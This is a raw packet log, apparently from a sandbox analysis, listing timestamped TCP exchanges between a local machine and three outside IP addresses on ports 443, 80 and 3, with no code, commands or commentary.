Oct 9, 2024 16:29:51.072069883 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.072416067 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.072516918 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.072896957 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.077689886 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.077853918 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.077881098 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.078052998 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.078100920 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.078205109 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.078310013 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.078330994 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.078341961 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.078422070 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.078488111 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.078490019 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.078504086 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.078615904 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.078628063 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.078671932 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.078721046 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.078748941 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.078785896 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.078860998 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.078886032 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.078890085 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.078897953 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.079006910 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.079056978 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.079102039 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.079106092 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.079117060 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.079210997 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.079267025 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.079277039 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.079392910 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.079474926 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.079484940 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.079595089 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.079605103 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.079705954 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.079715014 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.079772949 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.079817057 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.079922915 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.079982996 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.079993010 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.080060005 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.080068111 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.080117941 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.080157042 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.080168009 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.080216885 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.080353022 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.080372095 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.080380917 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.080445051 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.080528021 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.080538034 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.080593109 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.080697060 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.080703020 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.080712080 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.080926895 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.081037045 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.081237078 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.091869116 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.092034101 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.093154907 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.093373060 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.093434095 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.093535900 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.093559027 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.093657970 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.093669891 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.093749046 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.093807936 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.093847990 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.093956947 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.093967915 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.094048023 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.094098091 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.094155073 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.094273090 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.094283104 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.094363928 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.094455957 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.094471931 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.094645977 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.094669104 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.094737053 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.094738960 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.094970942 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.094980001 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.095005989 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.095139980 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.095163107 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.095217943 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.095226049 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.095280886 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.095400095 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.095410109 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.095478058 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.095488071 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.095621109 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.095628977 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.095642090 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.095699072 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.095706940 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.095804930 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.095868111 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.095876932 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.095995903 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.096088886 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.096100092 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.096167088 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.096232891 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.096349001 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.096374989 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.096385002 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.096541882 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.096544027 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.096580029 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.096635103 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.096643925 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.096699953 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.096803904 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.097157001 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.097233057 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.097346067 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.097362995 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.097440958 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.097449064 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.097521067 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.097635984 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.097646952 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.097724915 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.097795963 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.097899914 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.097922087 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.097959042 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.098064899 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.098109961 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.098217010 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.098226070 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.098284006 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.098315954 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.098552942 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.098562956 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.098664045 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.098725080 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.098736048 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.098783970 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.098869085 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.098879099 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.098974943 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.099052906 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.099057913 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.099066973 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.099241972 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.099275112 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.099284887 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.099406958 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.099443913 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.099630117 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.099672079 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.099721909 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.099805117 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.099924088 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.099934101 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.100028038 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.100030899 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.100156069 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.100157976 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.100167036 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.100258112 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.100379944 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.100460052 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.100626945 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.100697041 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.100754976 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.100847006 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.100856066 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.100944996 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.101032019 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.101207972 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.101244926 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.101255894 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.101327896 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.101432085 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.101579905 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.101716042 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.101718903 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.101809025 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.101815939 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.101823092 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.101900101 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.102068901 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.102094889 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.102176905 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.102241993 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.102289915 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.102299929 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.102380037 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.102399111 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.102452993 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.102467060 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.102550030 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.102636099 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.102969885 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.103223085 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.103250980 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.103260040 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.103358984 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.103367090 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.103416920 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.103446960 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.103456020 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.103512049 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.103519917 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.103615999 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.103622913 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.103678942 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.103693962 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.103787899 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.103863001 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.103883982 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.104006052 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.104015112 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.104110003 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.104115009 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.104127884 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.104187965 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.104197025 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.104273081 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.104371071 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.104381084 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.104449034 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.104456902 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.104563951 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.104639053 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.104656935 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.104667902 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.104763031 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.104772091 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.104903936 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.104912996 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.105010033 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.105046988 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.105124950 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.105133057 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.105182886 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.105253935 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.105283976 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.105357885 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.105365038 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.105456114 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.105488062 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.105496883 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.105604887 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.105695963 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.105704069 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.105825901 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.105839014 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.105942965 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.105950117 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.106020927 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.106098890 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.160923004 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.161075115 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.161163092 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.161175013 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.161259890 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.161264896 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.161333084 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.161343098 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.161381006 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.161456108 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.161571980 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.161580086 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.161751986 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.161925077 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.162039995 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.162050009 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.162111044 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.162143946 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.162300110 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.162308931 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.162653923 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.162806988 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.162832975 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.162854910 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.163002014 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.163012028 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.163089991 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.163132906 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.163132906 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.163275957 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.167565107 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:30:05.874514103 CEST	49777	80	192.168.11.30	104.16.184.241
Oct 9, 2024 16:30:05.968780994 CEST	80	49777	104.16.184.241	192.168.11.30
Oct 9, 2024 16:30:05.969012022 CEST	49777	80	192.168.11.30	104.16.184.241
Oct 9, 2024 16:30:05.969144106 CEST	49777	80	192.168.11.30	104.16.184.241
Oct 9, 2024 16:30:06.063594103 CEST	80	49777	104.16.184.241	192.168.11.30
Oct 9, 2024 16:30:06.123402119 CEST	80	49777	104.16.184.241	192.168.11.30
Oct 9, 2024 16:30:06.168503046 CEST	49777	80	192.168.11.30	104.16.184.241
Oct 9, 2024 16:30:17.724982977 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:17.963512897 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:17.963893890 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:17.980480909 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:17.980503082 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.218847990 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.218966961 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.218976021 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.219228029 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.219253063 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.219322920 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.219502926 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.219656944 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.457691908 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.457905054 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.457988977 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.458049059 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.458108902 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.458303928 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.458308935 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.458319902 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.458329916 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.458466053 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.458511114 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.458643913 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.458973885 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.696525097 CEST	3	49781	89.23.100.233	192.168.11.30
